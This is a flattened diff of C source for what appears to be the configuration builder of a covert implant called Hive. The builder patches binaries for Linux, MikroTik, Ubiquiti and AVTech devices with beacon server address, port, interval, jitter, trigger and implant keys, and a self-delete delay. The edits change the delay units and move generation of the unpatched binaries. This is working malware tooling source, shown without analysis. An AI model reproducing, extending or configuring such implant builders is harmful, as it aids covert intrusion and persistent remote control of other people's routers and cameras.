skipped 50 lines 51 51 //******************************************************************************** 52 52 53 53 #define SIG_HEAD 0x7AD8CFB6 54 - #define DEFAULT_INITIAL_DELAY 3 * 60 * 1000 // 3 minutes 54 + #define DEFAULT_INITIAL_DELAY 3 * 60 // 3 minutes 55 55 #define DEFAULT_BEACON_PORT 443 // TCP port 443 (HTTPS) 56 56 #define DEFAULT_BEACON_INTERVAL 0 // operators did not want a default value 57 - #define DEFAULT_TRIGGER_DELAY 60 * 1000 // 60 seconds 57 + #define DEFAULT_TRIGGER_DELAY 60 // 60 seconds 58 58 #define DEFAULT_BEACON_JITTER 3 // Default value is 3, range is from 0<=jitter<=30 59 59 #define DEFAULT_SELF_DELETE_DELAY 60 * 24 * 60 * 60 // Default value is 60 days... 60 60 skipped 133 lines 194 194 break; 195 195 196 196 case 'd': // initial delay 197 - args.init_delay = strtoul(optarg, NULL, 10) * 1000 ; 197 + args.init_delay = strtoul(optarg, NULL, 10); 198 198 break; 199 199 200 200 case 'h': // Help skipped 1 lines 202 202 break; 203 203 204 204 case 'i': // beacon interval 205 - args.interval = (unsigned int) atoi(optarg) * 1000 ; 205 + args.interval = (unsigned int) atoi(optarg); 206 206 break; 207 207 208 208 case 'j': // beacon jitter skipped 171 lines 380 380 break; 381 381 382 382 case 't': // trigger delay 383 - args.trigger_delay = (unsigned int) atoi(optarg) * 1000 ; 383 + args.trigger_delay = (unsigned int) atoi(optarg); 384 384 break; 385 385 386 386 default: skipped 3 lines 390 390 } 391 391 } 392 392 393 + if (raw == 1) { 394 + printf("Creating raw unpatched binaries for all supported architectures..."); 395 + 396 + remove(HIVE_LINUX_X86_UNPATCHED); 397 + remove(HIVE_MIKROTIK_X86_UNPATCHED); 398 + remove(HIVE_MIKROTIK_MIPS_UNPATCHED); 399 + remove(HIVE_MIKROTIK_PPC_UNPATCHED); 400 + remove(HIVE_UBIQUITI_MIPS_UNPATCHED); 401 + remove(HIVE_AVTECH_ARM_UNPATCHED); 402 + 403 + non_patch(HIVE_LINUX_X86_UNPATCHED, hived_linux_x86_unpatched, hived_linux_x86_unpatched_len); 404 + non_patch(HIVE_MIKROTIK_X86_UNPATCHED, hived_mikrotik_x86_unpatched, hived_mikrotik_x86_unpatched_len); 405 + non_patch(HIVE_MIKROTIK_MIPS_UNPATCHED, hived_mikrotik_mips_unpatched, hived_mikrotik_mips_unpatched_len); 406 + non_patch(HIVE_MIKROTIK_PPC_UNPATCHED, hived_mikrotik_ppc_unpatched, hived_mikrotik_ppc_unpatched_len); 407 + non_patch(HIVE_UBIQUITI_MIPS_UNPATCHED, hived_ubiquiti_mips_unpatched, hived_ubiquiti_mips_unpatched_len); 408 + non_patch(HIVE_AVTECH_ARM_UNPATCHED, hived_avtech_arm_unpatched, hived_avtech_arm_unpatched_len); 409 + printf("done.\n"); 410 + return 0; 411 + } 412 + 393 413 if (! keyed) { // Verify that a key was supplied 394 414 printf("\n %sERROR: Key missing%s\n ", RED, RESET); 395 415 usage(argv); skipped 28 lines 424 444 } 425 445 } 426 446 427 - if (raw == 0) { 428 - if (args.init_delay > 0) { // Beacons enabled429 - if ((args.beacon_port == 0) || (args.interval == 0) || (strlen(args.beacon_ip) == 0)) { 430 - printf("\n"); 431 - printf(" %sERROR: Incomplete options%s\n", RED, RESET); 432 - usage(argv); 433 - return -1; 434 - } 435 - // Enforce 0 <= jitter <= 30 requirement. 436 - if (((int) args.jitter < 0) || (args.jitter > 30)) { 437 - printf("\n"); 438 - printf(" %sError: Incorrect options%s\n", RED, RESET); 439 - usage(argv); 440 - return -1; 441 - } 447 + 448 + if (args.init_delay > 0) { // Beacons enabled 449 + if ((args.beacon_port == 0) || (args.interval == 0) || (strlen(args.beacon_ip) == 0)) { 450 + printf("\n"); 451 + printf(" %sERROR: Incomplete options%s\n", RED, RESET); 452 + usage(argv); 453 + return -1; 442 454 } 455 + // Enforce 0 <= jitter <= 30 requirement. 456 + if (((int) args.jitter < 0) || (args.jitter > 30)) { 457 + printf("\n"); 458 + printf(" %sError: Incorrect options%s\n", RED, RESET); 459 + usage(argv); 460 + return -1; 461 + } 462 + } 443 463 444 - if ( (linux_x86 == 0) &&445 - (mikrotik_x86 == 0) && 446 - (mikrotik_mips == 0) && (mikrotik_ppc == 0) && 447 - (ubiquiti_mips == 0) && 448 - (avtech_arm == 0) 449 - ) { // no OS was selected, so default is to build all 450 - linux_x86 = 1; 451 - mikrotik_x86 = 1; 452 - mikrotik_mips = 1; 453 - mikrotik_ppc = 1; 454 - ubiquiti_mips = 1; 455 - avtech_arm = 1; 456 - } 464 + if ( (linux_x86 == 0) && 465 + (mikrotik_x86 == 0) && 466 + (mikrotik_mips == 0) && (mikrotik_ppc == 0) && 467 + (ubiquiti_mips == 0) && 468 + (avtech_arm == 0) 469 + ) { // no OS was selected, so default is to build all 470 + linux_x86 = 1; 471 + mikrotik_x86 = 1; 472 + mikrotik_mips = 1; 473 + mikrotik_ppc = 1; 474 + ubiquiti_mips = 1; 475 + avtech_arm = 1; 476 + } 457 477 458 - printf("\n");459 - printf(" This application will generate PATCHED files with the following values:\n\n");460 - printf("\t%32s: %-s\n", "Primary DNS Server IP address", args.dns[0]);461 - printf("\t%32s: %-s\n", "Secondary DNS Server IP address", args.dns[1]);462 - printf("\t%32s: ", "Trigger Key"); printSha1Hash(stdout, "", triggerKey); printf("\n");463 - printf("\t%32s: ", "Implant Key"); printSha1Hash(stdout, "", implantKey); printf("\n");464 - if (args.init_delay > 0) {465 - printf("\n\t%32s: %-s\n", "Beacon Server IP address", host); 466 - printf("\t%32s: %-d\n", "Beacon Server Port number", args.beacon_port); 467 - printf("\t%32s: %-lu\n", "Beacon Initial Delay (sec)", args.init_delay / 1000 ); 468 - printf("\t%32s: %-d\n", "Beacon Interval (sec)", args.interval / 1000 ); 469 - printf("\t%32s: %-d\n", "Beacon Jitter (%)", args.jitter); 470 - } else {471 - printf("\n\t%32s\n", "Beacons Disabled"); 472 - } 473 - printf("\n\t%32s: %-lu\n", "Self Delete Delay (sec)", args.delete_delay); 474 - printf("\t%32s: %-s\n", "Self Delete Control File Path", args.sdpath); 475 - printf("\t%32s: %-d\n", "Trigger Delay (+/-30 sec)", args.trigger_delay / 1000); 478 + printf("\n"); 479 + printf(" This application will generate PATCHED files with the following values:\n\n"); 480 + printf("\t%32s: %-s\n", "Primary DNS Server IP address", args.dns[0]); 481 + printf("\t%32s: %-s\n", "Secondary DNS Server IP address", args.dns[1]); 482 + printf("\t%32s: ", "Trigger Key"); printSha1Hash(stdout, "", triggerKey); printf("\n"); 483 + printf("\t%32s: ", "Implant Key"); printSha1Hash(stdout, "", implantKey); printf("\n"); 484 + if (args.init_delay > 0) { 485 + printf("\n\t%32s: %-s\n", "Beacon Server IP address", host); 486 + printf("\t%32s: %-d\n", "Beacon Server Port number", args.beacon_port); 487 + printf("\t%32s: %-lu\n", "Beacon Initial Delay (sec)", args.init_delay); 488 + printf("\t%32s: %-d\n", "Beacon Interval (sec)", args.interval); 489 + printf("\t%32s: %-d\n", "Beacon Jitter (%)", args.jitter); 490 + } else { 491 + printf("\n\t%32s\n", "Beacons Disabled"); 476 492 } 493 + printf("\n\t%32s: %-lu\n", "Self Delete Delay (sec)", args.delete_delay); 494 + printf("\t%32s: %-s\n", "Self Delete Control File Path", args.sdpath); 495 + printf("\t%32s: %-d\n", "Trigger Delay (+/-30 sec)", args.trigger_delay); 496 + 477 497 478 498 printf("\n Target Operating Systems:\n"); 479 499 480 500 // little endian systems targets 481 501 482 - if (linux_x86 == 1 | | raw = = 1 ) printf(" . Linux/x86\n"); 483 - if (mikrotik_x86 == 1 | | raw = = 1 ) printf(" . MikroTik/x86\n"); 484 - if (mikrotik_mips == 1 | | raw = = 1 ) printf(" . MikroTik/MIPS\n"); 485 - if (mikrotik_ppc == 1 | | raw = = 1 ) printf(" . MikroTik/PPC\n"); 486 - if (ubiquiti_mips == 1 | | raw = = 1 ) printf(" . Ubiquiti/MIPS\n"); 487 - if (avtech_arm == 1 | | raw = = 1 ) printf(" . AVTech/ARM\n"); 502 + if (linux_x86 == 1) printf(" . Linux/x86\n"); 503 + if (mikrotik_x86 == 1) printf(" . MikroTik/x86\n"); 504 + if (mikrotik_mips == 1) printf(" . MikroTik/MIPS\n"); 505 + if (mikrotik_ppc == 1) printf(" . MikroTik/PPC\n"); 506 + if (ubiquiti_mips == 1) printf(" . Ubiquiti/MIPS\n"); 507 + if (avtech_arm == 1) printf(" . AVTech/ARM\n"); 488 508 489 - if (raw == 0) { 490 - cl_string((unsigned char *) args.dns[0 ], sizeof(args.dns[0 ]));491 - cl_string((unsigned char *) args.dns [ 1 ] , sizeof(args.dns [ 1 ] ));492 - cl_string((unsigned char *) args.beacon_ip , sizeof(args.beacon_ip ));493 - cl_string((unsigned char *) args.sdpath, sizeof(args.sdpath)); 494 - } 509 + cl_string((unsigned char *) args.dns[0], sizeof(args.dns[0])); 510 + cl_string((unsigned char *) args.dns[1 ], sizeof(args.dns[1 ])); 511 + cl_string((unsigned char *) args.beacon_ip , sizeof(args.beacon_ip )); 512 + cl_string((unsigned char *) args.sdpath , sizeof(args.sdpath )); 495 513 496 514 remove(HIVE_LINUX_X86_FILE); 497 515 remove(HIVE_MIKROTIK_X86_FILE); skipped 2 lines 500 518 remove(HIVE_UBIQUITI_MIPS_FILE); 501 519 remove(HIVE_AVTECH_ARM_FILE); 502 520 503 - remove(HIVE_LINUX_X86_UNPATCHED); 504 - remove(HIVE_MIKROTIK_X86_UNPATCHED); 505 - remove(HIVE_MIKROTIK_MIPS_UNPATCHED); 506 - remove(HIVE_MIKROTIK_PPC_UNPATCHED); 507 - remove(HIVE_UBIQUITI_MIPS_UNPATCHED); 508 - remove(HIVE_AVTECH_ARM_UNPATCHED); 509 521 510 522 sleep(1); 511 523 512 - if (raw == 1) { 513 - printf("\n"); 514 - non_patch(HIVE_LINUX_X86_UNPATCHED, hived_linux_x86_unpatched, hived_linux_x86_unpatched_len); 515 - non_patch(HIVE_MIKROTIK_X86_UNPATCHED, hived_mikrotik_x86_unpatched, hived_mikrotik_x86_unpatched_len); 516 - non_patch(HIVE_MIKROTIK_MIPS_UNPATCHED, hived_mikrotik_mips_unpatched, hived_mikrotik_mips_unpatched_len); 517 - non_patch(HIVE_MIKROTIK_PPC_UNPATCHED, hived_mikrotik_ppc_unpatched, hived_mikrotik_ppc_unpatched_len); 518 - non_patch(HIVE_UBIQUITI_MIPS_UNPATCHED, hived_ubiquiti_mips_unpatched, hived_ubiquiti_mips_unpatched_len); 519 - non_patch(HIVE_AVTECH_ARM_UNPATCHED, hived_avtech_arm_unpatched, hived_avtech_arm_unpatched_len); 520 - } 521 524 // We start as Little Endian. If the binary is detected as Big Endian, then the structure 522 525 // is changed to Big Endian. Since these changes are made in a global variable used by all 523 526 // parsers, check for Little Endian variants first and the Big Endian possibilities next. skipped 117 lines